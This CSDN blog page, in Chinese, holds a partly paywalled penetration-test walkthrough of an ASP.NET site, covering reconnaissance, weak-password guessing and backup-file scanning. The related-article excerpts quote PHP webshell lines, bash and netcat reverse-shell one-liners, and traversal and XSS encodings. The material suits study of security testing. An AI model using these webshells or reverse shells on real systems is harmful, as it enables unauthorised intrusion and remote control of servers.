编程代码:大神教你如何进行渗透测试

最新推荐文章于 2024-08-12 10:55:30 发布
最新推荐文章于 2024-08-12 10:55:30 发布
阅读量3.6k 收藏 8
点赞数 4
分类专栏: C 文章标签: 实战渗透 编程语言 编程学习 编程小白
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45713725/article/details/109332792
版权
本文详细介绍了如何进行渗透测试,从信息收集到利用SQL注入、Webshell获取,揭示了在ASP.NET网站上的渗透过程。通过追踪代码、解密算法,最终成功突破目标系统。
摘要由CSDN通过智能技术生成

使用关键词得到目标源码

前言:对某网站进行渗透测试,此次渗透给的是一个主域名,并且也没有子域,打开了目标网站先对其进行一波信息收集

 

中间件: IIS 8.5

 

输入admin发现自动添加了/

说明其目录存在,那么盲猜一波文件,login.aspx default.aspx main.aspx 等等

 

最终在login.aspx下面发现后台登录页面。这不猜他一波弱口令??

一顿操作过后账号被锁

 

熟悉的开局,既然如此只能尝试其他方法了。

在主页的html代码中发现了某处信息

 

设计制作?根据后面的域名访问过去,是一个建站公司

那么,入手点来了。IIS8.5+ASP.NET+建站系统

先扫一波备份文件:

 

400多条ip这开发商还行。使用FOFA查询工具,批量导出

 

然后我们来扫一下备份文件。这里推荐我B哥的扫描器

htt删ps://gith删ub.com/broke删n5/WebAl删iveScan

最低0.47元/天 解锁文章
MAX在码字
关注
专栏目录
[网络安全自学篇] 八十七.恶意代码检测技术详解及总结
杨秀璋的专栏
07-16 2万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了威胁情报分析,通过Python抓取FreeBuf网站“APT”主题的相关文章。这篇文章将详细总结恶意代码检测技术,包括恶意代码检测的对象和策略、特征值检测技术、校验和检测技术、启发式扫描技术、虚拟机检测技术和主动防御技术。基础性文章,希望对您有所帮助~
渗透测试代码执行漏洞
ssrf
08-07 745
一、原理及成因 RCE代码执行(注入)是指应用程过滤不严,用户可以通过请求将代码注入到应用程序中执行。代码执行(注入)类似于SQL注入漏洞,SQLi是将SQL语句注入到数据库中执行,而代码执行则是把代码注入到应用中最终服务器运行它,这样的漏洞如果没有特殊的过滤,相当于有一个web后门的存在。 二、漏洞危害 WEB应用如果存在代码执行漏洞是一件非常可拍的事情,就像一个人没有穿衣服,赤裸裸的暴露在光天化日之下,可以通过代码执行漏洞继承web用户权限,执行任意代码。如果具有服务器没有正确配置,web用户权限比较高
web代码审计与渗透测试
08-22
代码审计,渗透测试,从原理上阐述代码漏洞的原因,进而解释如何进行渗透测试
前端开发转行做渗透测试容易吗?通过挖漏洞来赚钱靠谱吗?
最新发布
QIANDXX的博客
08-12 643
渗透测试感兴趣的,学习起来喽~参考资料[1]渗透测试执行标准: http://www.pentest-standard.org/index.php/Main_Page[2]《XSS 扫描器成长记》: https://paper.seebug.org/1119/[3]xray 的规则化过的 POC(漏洞概念验证程序) 数据: https://github.com/chaitin/xray/tree/master/pocs[4][5][6][7][8][9][10][11]
渗透基础代码
m0_74322086的博客
09-28 152
学习渗透的一个基础的代码,主要供学习使用,无太大的借鉴作用。
渗透常用代码
aibi3754的博客
05-31 1100
PHP相关 <?php copy("http://x.x.x.x/shell.txt", "d:\www\shell.php"); ?> <?php include "$_GET['_']"; ?> <?php assert($_POST["1"]);?> <?php $url = "http://...
安全测评之渗透测试整改设计和代码
新手新手新的博客
02-20 675
文章目录安全测评之渗透测试1. 任意文件上传漏洞2. 中间件版本泄漏3. 目录遍历4. 关键会话重放攻击5. 检测存在风险的无关服务和端口6. 不安全的HTTP方法 安全测评之渗透测试 1. 任意文件上传漏洞 原因:可直接上传WebShell文件(在数据包内篡改文件后缀,限制可以被绕过) 解决办法:通过判断文件头(魔数)确定文件是否真实有效(APK文件通过判断文件后缀来判断) JAVA对文件类型的校验 /**************************************************
渗透测试【信息收集之web源码获取】
m0_67742636的博客
11-25 2077
渗透
关于《Python黑帽子:黑客与渗透测试编程之道》的学习笔记
Mi1k7ea
05-04 2万+
本篇文章是学习《Python黑帽子:黑客与渗透测试编程之道》的笔记,会持续地将书上的代码自己敲一遍,从而让自己对Python的安全编程有更多的了解,同时希望各位可以给给建议,不足之处太多了。 第一章——设置Python环境: Kali Linux的安装就不说了,最近有更新为2017版的可以下载。 确认是否安装了正确的Python版本: 确认是2.7版本的即可。 接着安装P
[网络安全自学篇] 三十九.hack the box渗透之DirBuster扫描路径及Sqlmap高级注入用法(三)
杨秀璋的专栏
01-15 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文详细讲解了hack the box在线渗透平台注册过程,以及Web渗透三道入门题目,包括Python编写md5加密发送Post、万能密码和URL路径猜测、BurpSuite和Hydra密码爆破等。这篇文章将通过两个题目分享DirBuster扫描目录、Fuzzy爆破指定路径名称,通过Sqlmap工具实现SQL注入并获取管理员用户名和密码、文件下载等用法。希望您喜欢~
渗透测试项目
02-10
渗透测试项目
[网络安全自学篇] 十四.Python攻防之基础常识、正则表达式、Web编程和套接字通信(一)
热门推荐
杨秀璋的专栏
09-29 2万+
这是作者的系列网络安全自学教程,主要是关于网安工具和实践操作的在线笔记,特分享出来与博友共勉,希望您们喜欢,一起进步。前文分享了Wireshark抓包原理知识,并结合NetworkMiner工具抓取了图像资源和用户名密码,本文将讲解Python网络攻防相关基础知识,包括正则表达式、Web编程和套接字通信。本文参考了爱春秋ADO老师的课程内容,这里也推荐大家观看他Bilibili和ichunqiu的课程,同时也结合了作者之前的经验进行讲解。
代码审查(测试)、渗透测试
软件设计师到程序员
07-05 4471
简而言之:源代码审查 源代码安全性分析(源代码审查)是检查Web APP源代码,以查找在初始开发阶段忽略的错误。Pentester启动一个代码分析器,逐行扫描Web APP的代码。一旦在测试环境中部署的分析器发现漏洞,测试人员就会手动检查它们以消除误报。 测试者在源代码审查上花费的时间因编程语言和APP的大小而异。例如,1000行代码可能需要0.5到2个小时来分析。 检测到漏洞 源代码审查...
kali综合渗透测试-常用代码
W小哥
04-09 1517
命令执行漏洞反弹shell代码: echo “bash -i >& /dev/tcp/192.168.56.102/6666 0>&1” | bash burpsuite抓包修改用户名密码的数据包内容代入数据库执行,反弹shell语句 rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168...
web渗透编码
Blog_inG的博客
09-04 1214
. %2E ' %18 ;%3B / %2F " %22 > %3E   %20 = %3d 回车 %0A ../ %2e%2e%2f ..\ %2e%2e%5c ..\ %252e%252e%255c双层url编码 ../ ..%c0%af utf-8 ..\ ..%c1%9c %3C%2Fp%3E%20%3Cscript%3Ealert(1133441);%3C
代码审计系列篇二之渗透技巧
dfdhxb995397的博客
12-07 176
渗透技巧对于代码审计的意义在哪?我们知道代码审计的流程中有漏洞发现及payload构造,有的时候在漏洞发现阶段灰盒测试比源代码审计的速度更快效率更高,源代码审计,你得看代码吧,而灰盒测试时,测试语句以上,漏洞就发现了。payload的出现是为了证明漏洞的存在,而payload构造,单单作为一个开发程序员,或者渗透技巧菜鸟即便明白攻击原理,在漏洞证明时,也不一定能够证明出来。为什么?有一些...
渗透测试代码审计到RCE
qq_53142368的博客
06-09 546
文章目录前言一、代码审计前的准备把握大局:二、常见的INI配置总结 前言 一、代码审计前的准备 把握大局: 网站结构: 浏览源码文件夹,了解该程序的大致目录 入口文件: index.php,admin.php文件一般时整个程序的入口,详细读一下index文件可以知道程序的架构,运行流程,包含那些配置文件,包含哪些过滤文件以及包含那些安全过滤文件,了解程序的业务逻辑 配置文件:一般类似config.php等文件,保存一些数据库相关信息,程序的一些信息,先看看数据库编码,如果是gbk则可能存在宽字节注入,如果变
python渗透测试入门之代码注入
ailx10
06-28 1844
近期收到了电子工业出版社赠送的一本网络安全书籍《python黑帽子》,书中一共24个实验,今天复现第23个实验( 代码注入),我的测试环境是windows10虚拟机(64位)+conda开发环境+python3.7,这个实验是基于模拟受害服务程序,直接能够弹一个shell出来,如果不基于模拟受害服务程序,双击vbs文件也能达到相同的效果,还有一点需要注意的是下载增强版的nc哦,否则无法反弹shel...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值